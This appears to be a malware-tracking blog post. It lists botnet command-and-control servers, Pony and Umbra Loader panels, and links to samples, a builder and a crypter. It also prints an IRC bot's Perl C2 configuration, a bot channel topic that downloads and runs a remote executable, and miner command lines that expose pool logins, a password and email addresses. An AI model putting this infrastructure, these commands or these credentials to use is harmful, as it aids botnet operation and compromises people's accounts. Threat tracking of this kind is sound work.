Another botnet found by aLiSs
Server: 94.242.198.64:5050
channel: #work
Now talking in #work
Topic On: [ #work ] [ , ]
Topic By: [ x ]
hosting infos: http://whois.domaintools.com/94.242.198.64
46.182.107.35(irc botnet hosted in Netherlands Amsterdam Rens Ariens Trading As Your Internet Service Provider)
Server: 46.182.107.35:4042
channel: #pirelli
Now talking in #pirelli
Topic On: [ #pirelli ] [ !down /99/106/112/81/55/59/40/125/111/122/35/110/105/106/100/107/119/122/121/59/106/120/102/9/71/113/109/127/105/99/54/56/52/50/49/22/48/55/59/15/44/52/51/40/99/101/ 12]
Topic By: [ x ]
credits to aLiSs for finding this botnet
hosting infos: http://whois.domaintools.com/46.182.107.35
150MB samples
This is another package with different malware samples. Have fun analysing them. You can get the samples here.
199.127.102.218(Umbra Loader hosted in United States Miami Avesta Networks Llc)
Panel here: hxxp://199.127.102.218/handy/beta/Panel/Panel/
stub here: hxxp://199.127.102.218/handy/beta/Bot/stub/
Builder: hxxp://199.127.102.218/handy/UMBRA_LOADER_1.2.0.RAR
usb spread plugin: hxxp://199.127.102.218/handy/beta/Bot/Plugins/usbspreader.umbplg
hosting infos: http://whois.domaintools.com/199.127.102.218
irc.edsel.us.to(PHP bots hosted in Canada Montreal Software AS32613 IWEB-AS – iWeb Technologies Inc)
Configuration block from the bot's Perl source (the fake process name, C2 server, port, nick and channel it uses):
my $fakeproc = "sh -c (ps -aux)2>&1";   # process name shown in ps listings
my $ircserver = "irc.edsel.us.to";      # C2 IRC server
my $ircport = "7221";                   # C2 port
my $nickname = "i-escorts";             # bot nick
my $ident = "bogo";
my $channel = "#jurig";                 # command channel
my $admin = "SmitfraudFix";             # nick the bot accepts commands from
my $fullname = "naon";
Full source here
hosting infos: http://whois.domaintools.com/184.107.213.58
securityspecialiastinc.in(Pony hosted in Japan Tokyo Linode Llc)
Resolved: [securityspecialiastinc.in] To [106.187.88.52]
Gate: securityspecialiastinc.in/p/gate.php
Admin: securityspecialiastinc.in/p/admin.php
sample: hxxp://106.187.88.52/p/p.exe
Online Crypter: hxxp://securityspecialiastinc.in/crypt.php
hosting infos: http://whois.domaintools.com/106.187.88.52
ilikeithard.tk(Pony hosted in United States Kansas City Datashack Lc)
Resolved: [ilikeithard.tk] To [63.141.253.125]
Panel: hxxp://ilikeithard.tk/Panel/admin.php
Sample: directxex.com/uploads/1632963588.Pony.exe
found by justaguy
hosting infos: http://whois.domaintools.com/63.141.253.125
t7v4d.com(irc botnet hosted in United States Phoenix Secured Servers Llc)
Thanks to this guy for the sample
Resolved: [t7v4d.com] To [108.170.24.42]
Server: t7v4d.com:4040
Now talking in ##tnt
Topic is '!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r'
hosting infos: http://whois.domaintools.com/108.170.24.42
privatesmartscreen.nl(Bitcoin Miner hosted in Netherlands Amsterdam Denkers-ict B.v.)
DNS Queries:
privatesmartscreen.nl DNS_TYPE_A 159.253.0.151
HTTP Conversations:
159.253.0.151:80 - [privatesmartscreen.nl] Request: GET /Bitcoin/host.txt
149.210.128.55:80 - [149.210.128.55]
Request: GET /bitconi/winlogon32.exe
Request: GET /bitconi/winlogon64.exe
Request: GET /bitconi/usft_ext.dll
Request: GET /bitconi/miner.dll
Request: GET /bitconi/coinutil.dll
Request: GET /ptx.exe
Request: GET /bitconi/btc.exe
Request: GET /bitconi/phatk.exe
Dutch hacker here (miner command line with the pool login):
winlogon32.exe" -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321
Samples:
pool.50btc.com(Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)
Resolved: [pool.50btc.com] To [144.76.52.43]
HTTP Requests: hxxp://pool.50btc.com:8332/
DATA:
POST / HTTP/1.1
Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==
Content-Length: 128
X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchto
User-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3)
Host: pool.50btc.com:8332
Cache-Control: no-cache

{"method": "getblocktemplate", "params": [{"capabilities": ["coinbasetxn", "workid", "coinbase/append", "longpollid"]}], "id":0}
Here the hacker (miner command line with the pool login):
lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332
Sample: hxxp://158.255.2.104/cucaz.exe
hosting infos: http://whois.domaintools.com/144.76.52.43